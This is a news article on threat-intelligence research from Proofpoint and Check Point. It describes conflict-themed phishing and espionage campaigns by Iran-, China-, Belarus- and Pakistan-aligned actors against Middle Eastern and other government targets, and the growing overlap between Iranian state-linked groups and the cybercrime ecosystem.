New research from Proofpoint shows that escalating tensions involving Iran have coincided with a surge in cyber espionage activity targeting governments, diplomats, and organizations across the Middle East. Threat campaigns have increasingly used the conflict itself as lure material in phishing operations, often leveraging compromised government email accounts to distribute malicious messages and collect intelligence from regional political and diplomatic targets. Analysts say some actors appear to be opportunistically exploiting the geopolitical crisis for routine cyber operations, while others show signs of intensified intelligence-gathering efforts tied directly to the conflict.
Separate analysis by Check Point Software Technologies highlights a parallel trend in which actors linked to Iran’s Ministry of Intelligence and Security are increasingly interacting with the cybercrime ecosystem. Groups such as Void Manticore, also known as ‘Handala Hack,’ and MuddyWater have shown repeated overlaps with criminal infrastructure, tools, and services, suggesting a growing reliance on underground resources to support state objectives. Researchers say this convergence allows Iranian operators to expand their capabilities while also blurring the line between espionage and cybercrime, complicating attribution and masking state involvement behind criminal activity.
“As the war continues into its second week, several Iranian hacktivist groups and personas have claimed responsibility for various disruptive operations. Iranian espionage-focused threat groups remain somewhat active despite the Iranian government’s shutdown of the internet immediately following the initial US and Israeli attacks,” Proofpoint wrote in its Wednesday blog post. “For instance, on 8 March, Proofpoint observed the Iran-aligned threat actor TA453 (Charming Kitten, Mint Sandstorm, APT42) conduct a credential phishing attempt against a US thinktank target. The email correspondence culminating in this credential phishing attempt commenced prior to the beginning of the conflict, indicating that TA453 is continuing to prioritize intelligence collection against its traditional target set.”
While it is unclear how wider Iranian cyber operations will continue, Proofpoint Threat Research has also observed an increase in campaigns from other state-sponsored threat actors targeting Middle East government organizations since the war began. These campaigns were conducted by both known groups and previously unobserved actors, with suspected attribution to China, Belarus, Pakistan, and Hamas.
The post added that the campaigns heavily relied on aspects of the conflict as topical lure content to engage targets and often used compromised accounts belonging to government organizations to send phishing emails. Proofpoint assesses that this activity reflects a mixture of threat actors opportunistically using the war as lure content to conduct routine operations and those with an increased focus on intelligence collection targeting Middle Eastern government and diplomatic entities.
Researchers at Proofpoint identified multiple cyber espionage campaigns tied to the regional conflict involving Iran, many of which used conflict-themed lures to target government and diplomatic organizations. One campaign attributed to the suspected China-aligned cluster UNK_InnerAmbush used phishing emails sent from a compromised account that linked to a Google Drive archive containing malicious files disguised as images. When opened, the files exploited DLL sideloading to deploy a Cobalt Strike payload for command-and-control activity. The phishing messages referenced geopolitical developments such as the reported death of Iran’s supreme leader and alleged plans for attacks on Gulf oil infrastructure.
Another operation by TA402, also known as Frankenstein or Cruel Jackal, targeted a Middle Eastern government entity using emails sent from both a compromised Iraqi Ministry of Foreign Affairs account and attacker-controlled Gmail addresses. The messages referenced potential U.S. military operations against Iran and a possible Gulf alliance responding to Iranian threats. Embedded links directed recipients either to a decoy document or to a spoofed Microsoft Outlook Web App login page designed to harvest credentials.
In a separate campaign, the suspected Pakistan-aligned actor UNK_RobotDreams targeted India-based offices of Middle Eastern government organizations with spear-phishing emails impersonating India’s Ministry of External Affairs. The messages contained a PDF themed around a Gulf security alert tied to potential Iranian retaliation; clicking a fake Adobe Reader button triggered the download of an executable loader that used PowerShell to retrieve a Rust-based backdoor from attacker infrastructure hosted through Azure Front Door.
Proofpoint also observed activity from a cluster tracked as UNK_NightOwl that sent phishing emails to a Middle Eastern government ministry using both a compromised Syrian government account and an attacker-controlled address. The emails referenced the escalating conflict and directed recipients to a domain spoofing Microsoft OneDrive that hosted an Outlook Web App-style credential harvesting page before redirecting victims to a legitimate conflict monitoring site.
Meanwhile, the Belarus-aligned actor TA473, also known as Winter Vivern, targeted government organizations in Europe and the Middle East with emails impersonating a spokesperson for the president of the European Council. These messages contained an HTML attachment posing as an EU statement about the Iran situation; opening the file displayed a decoy image while silently transmitting the recipient’s email address to attacker infrastructure.
The Proofpoint report also highlighted continued activity from the Iran-aligned group TA453, also known as Charming Kitten or APT42, which targeted a U.S. think tank by impersonating a policy researcher and inviting the victim to a roundtable discussion on Middle East air defense. After establishing trust through benign exchanges, the actor eventually sent a malicious link that redirected the target to a OneDrive-themed credential-phishing page hosted on Netlify.
Recent activity Check Point analyzed and associated with MOIS-affiliated cyber actors suggests that the same logic is now being applied in the cyber domain. It highlighted a shift beyond merely imitating cybercriminal behavior, noting that these actors are increasingly engaging with the broader cybercriminal ecosystem itself by leveraging its infrastructure, access brokers, marketplaces, and affiliate-style relationships.
“For years, Iranian intelligence services have operated through deniable criminal intermediaries in the physical world. A similar pattern is now becoming visible in cyber space, where state objectives are increasingly pursued through criminal tools, services, and operational models,” the post detailed. “Notably, this dynamic appears with growing frequency in activity associated with actors linked to the Ministry of Intelligence and Security (MOIS). For a long time, Iranian actors sought to mask state activity behind the appearance of ordinary cyber crime, most often by posing as ransomware operators.”
Noting that the trend the researchers are seeing now goes beyond imitation, Check Point added that “Rather than simply adopting criminal and hacktivist personas to complicate attribution, some Iranian actors appear to be associating with the cyber criminal ecosystem itself, leveraging its malware, infrastructure, and affiliate-style mechanisms. This shift matters because it does more than improve deniability; it can also expand operational reach and enhance technical capability.”
Void Manticore, also known as Handala, is an Iranian-linked threat actor active in hack-and-leak and disruptive cyber operations tied to strategic objectives. The group has operated through personas such as Homeland Justice, used in attacks on Albania, and Handala in campaigns targeting Israel.
While best known for wiper attacks and data leaks, the Handala operations also revealed the use of the commercially available infostealer Rhadamanthys, a widely used tool sold on darknet forums and employed by both cybercriminal and state-aligned actors. In several phishing campaigns against Israeli targets, the group paired Rhadamanthys with custom wipers, often disguising the lure as software updates.
Separately, the Iran-linked group MuddyWater, which U.S. authorities associate with Iran’s Ministry of Intelligence and Security, has long conducted espionage operations targeting government and private-sector organizations across sectors such as telecommunications, defense, and energy in the Middle East. Recent research shows overlaps between MuddyWater activity and criminal malware clusters, which have sometimes led to attribution confusion.
One example is the Tsundere Botnet, also called DinDoor, discovered in 2025 and linked to MuddyWater through infrastructure and operational patterns. The botnet uses Node[dot]js scripts to execute code on compromised systems and can switch to a Deno-based execution method when Node[dot]js is detected. Another overlap involves the downloader FakeSet, used in infection chains delivering CastleLoader malware. However, researchers assess that shared code-signing certificates used across MuddyWater tools, Tsundere variants, and CastleLoader likely indicate a common certificate source rather than direct operational collaboration.
